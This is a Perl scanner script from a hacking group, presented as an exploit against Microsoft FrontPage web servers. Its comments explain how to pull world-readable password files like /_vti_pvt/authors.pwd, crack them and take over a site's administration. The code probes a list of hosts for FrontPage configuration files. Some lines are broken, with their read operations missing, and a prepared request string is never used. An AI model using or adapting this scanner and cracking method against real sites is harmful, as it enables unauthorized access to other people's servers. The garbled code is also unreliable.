#!/usr/bin/perl # ---[ cyberunderground.cjb.net ]--- # EXPLOIT: Front Page Server # Frontpage Webserver allows authoring and administration of its websites remotely via a web interface. # It authenticates with a standard username password theme. Vulnerabilities include misconfigurations (which happen # more often than you might think) that allow outsiders to access this interface without a username or passowrd, # and read access to these password files. Oftentimes, /_vti_pvt/authors.pwd, administrator.pwd, etc. are world # readable, and you can use any standard password cracker (Like Crack or John the Ripper - just put the hash's in # unix passwd format) and you'll have administrative rights to the website. >:-)i # This little perl program (which must be run under Unix since it uses lynx - unless you have the DOS port of Lynx) # scans a host for such misconfigurations and open password files. # have phun! # # Various checks on Frontpage servers # Written by bansh33 of r00tabega.com [bansh33@r00tabega.com] # www.r00tabega.com # --------------------------------------------------------------------------------------------------------------- # Everybody knows about the _vti_pvt password files, but # what about those misconfigured Frontpage servers that allow # remote login and authoring without a login and password? # This script will scan for both vulnerabilties. # Makes for a quick and easy hack. # Note: This script is merely a proof of concept exploit, as such, the code probably isn't very clean. # # Greetings to Siegesoft, attrition, eEye, w00w00, USSR Labs, ADM, el8, phedz, and others I forgot to mention. # # Greetz to all of r00tabega -- my clique for life: busdr1v3r, Griffon, ytcracker, dilusi0n, Axtrex # # propz to my mommy and daddy cuz they make me drink my milk # # Currently, this code *requires* Lynx. In a future version I may eliminate the dependency on it. # ------begin c0de------------------------------------------------------------------------------------------------ use Socket; $postdata = "method\=list\+documents\%3a3\%2e0\%2e2\%2e1706\&service\%5fname\=\&listHiddenDocs\=true\&listExplorerDocs\=true\&li stRecurse\=false\&listFiles\=true\&listFolders\=true\&listLinkInfo\=true\&listIncludeParent\=true\&listDerivedT\=false\&listBord ers\=false"; # This string of postdata usually works, but you may want to modify this. print "[Frontpage Smack by bansh33 of r00tabega]\n"; print "[ -www.r00tabega.com- ]\n\n"; if (!($ARGV[0])) { print "usage: ./frontpage.pl [file with hostnames to check]\n"; exit; } $filetoopen = $ARGV[0]; open(thefile,$filetoopen); @thefile = ; close(thefile); foreach $host (@thefile) { $serverIP = inet_aton($host); $serverAddr = sockaddr_in(80, $serverIP); $number = 0; print "\n\nChecking $host for the Frontpage configuration file:\n\n"; socket(CLIENT, PF_INET, SOCK_STREAM, getprotobyname('tcp')); gethostbyname($host) or print "No IP address"; if(!gethostbyname($host)) { print "Can't Resolve DNS/IP"; } else { if(connect(CLIENT, $serverAddr)) { send(CLIENT,"GET /_vti_inf.html HTTP/1.0\n\n",0); $check=; ($http,$code,$therest) = split(/ /,$check); if($code == 200) { print "Found Frontpage configuration file...\n"; } else { print "Cannot Find Frontpage configuration...\n"; } } } } print "Scan complete.\n";